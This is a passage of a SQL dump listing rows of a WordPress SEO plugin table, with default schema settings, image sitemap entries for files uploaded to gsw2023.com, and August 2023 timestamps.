(57,974,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/2-r-tiny.png\"}]','2023-08-13 02:17:31',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:17:31','2023-08-13 02:17:31'),
(58,975,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/3-r-tiny.png\"}]','2023-08-13 02:17:31',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:17:31','2023-08-13 02:17:31'),
(59,976,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/addons-hero-tiny.png\"}]','2023-08-13 02:17:31',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:17:31','2023-08-13 02:17:31'),
(60,977,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/art-m-tiny.png\"}]','2023-08-13 02:17:31',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:17:31','2023-08-13 02:17:31'),
(61,978,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/l-1-tiny.png\"}]','2023-08-13 02:18:14',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:18:14','2023-08-13 02:18:14'),
(62,979,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/l-3-tiny.png\"}]','2023-08-13 02:18:14',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:18:14','2023-08-13 02:18:14'),
(63,980,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/r-1-tiny.png\"}]','2023-08-13 02:18:14',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:18:14','2023-08-13 02:18:14'),
(64,981,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/slider-logo-img-tiny.png\"}]','2023-08-13 02:18:14',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:18:14','2023-08-13 02:18:14'),
(65,982,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/vc-hero-tiny.png\"}]','2023-08-13 02:18:14',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:18:14','2023-08-13 02:18:14'),
(66,983,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/art-landing-addons-and-composer.jpg\"}]','2023-08-13 02:18:14',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:18:14','2023-08-13 02:18:14'),
(67,984,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/art-landing-wizard.jpg\"}]','2023-08-13 02:18:14',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:18:14','2023-08-13 02:18:14'),
(68,986,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/art-landing-main-demo-tiny.png\"}]','2023-08-13 02:18:14',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:18:14','2023-08-13 02:18:14'),
(69,987,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/art-landing-steps-wizard-tiny.png\"}]','2023-08-13 02:18:14',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:18:14','2023-08-13 02:18:14'),
(70,988,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/art-landing-theme-options-tiny.png\"}]','2023-08-13 02:18:14',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:18:14','2023-08-13 02:18:14'),
(71,990,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/elements-art-tiny.png\"}]','2023-08-13 02:19:01',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:19:01','2023-08-13 02:19:01'),
(72,991,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/headers-art-tiny.png\"}]','2023-08-13 02:19:01',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:19:01','2023-08-13 02:19:01'),
(73,992,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/plugins-art-tiny.png\"}]','2023-08-13 02:19:01',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:19:01','2023-08-13 02:19:01'),
(74,993,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/rating-art-tiny.png\"}]','2023-08-13 02:19:01',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:19:01','2023-08-13 02:19:01'),
(75,994,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/seo-art-tiny.png\"}]','2023-08-13 02:19:01',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:19:01','2023-08-13 02:19:01'),
(76,995,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/support-art-tiny.png\"}]','2023-08-13 02:19:01',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:19:01','2023-08-13 02:19:01'),
(77,996,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/translation-art-tiny.png\"}]','2023-08-13 02:19:01',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:19:01','2023-08-13 02:19:01'),
(78,997,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/updates-art-tiny.png\"}]','2023-08-13 02:19:01',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:19:01','2023-08-13 02:19:01'),
(79,998,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/woo-art-tiny.png\"}]','2023-08-13 02:19:01',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:19:01','2023-08-13 02:19:01'),
(80,1000,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/logo-floating-hd.png\"}]','2023-08-13 02:19:01',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:19:01','2023-08-13 02:19:01'),
(81,1001,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/logo-floating.png\"}]','2023-08-13 02:20:04',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:20:04','2023-08-13 02:20:04'),
(82,1002,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/i-options-tiny.png\"}]','2023-08-13 02:20:04',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:20:04','2023-08-13 02:20:04'),
(83,1003,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/i-testimonials-tiny.png\"}]','2023-08-13 02:20:04',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:20:04','2023-08-13 02:20:04'),
(84,1004,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'{\"blockGraphs\":[],\"customGraphs\":[],\"default\":{\"data\":{\"Article\":[],\"Course\":[],\"Dataset\":[],\"FAQPage\":[],\"Movie\":[],\"Person\":[],\"Product\":[],\"Recipe\":[],\"Service\":[],\"SoftwareApplication\":[],\"WebPage\":[]},\"graphName\":\"\",\"isEnabled\":true},\"graphs\":[]}','default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large','[{\"image:loc\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2016\\/11\\/i-wizard-tiny.png\"}]','2023-08-13 02:20:04',NULL,NULL,NULL,NULL,NULL,NULL,0,'{\"linkFormat\":{\"internalLinkCount\":0,\"linkAssistantDismissed\":false},\"primaryTerm\":{\"productEducationDismissed\":false}}','2023-08-13 02:20:04','2023-08-13 02:20:04'),
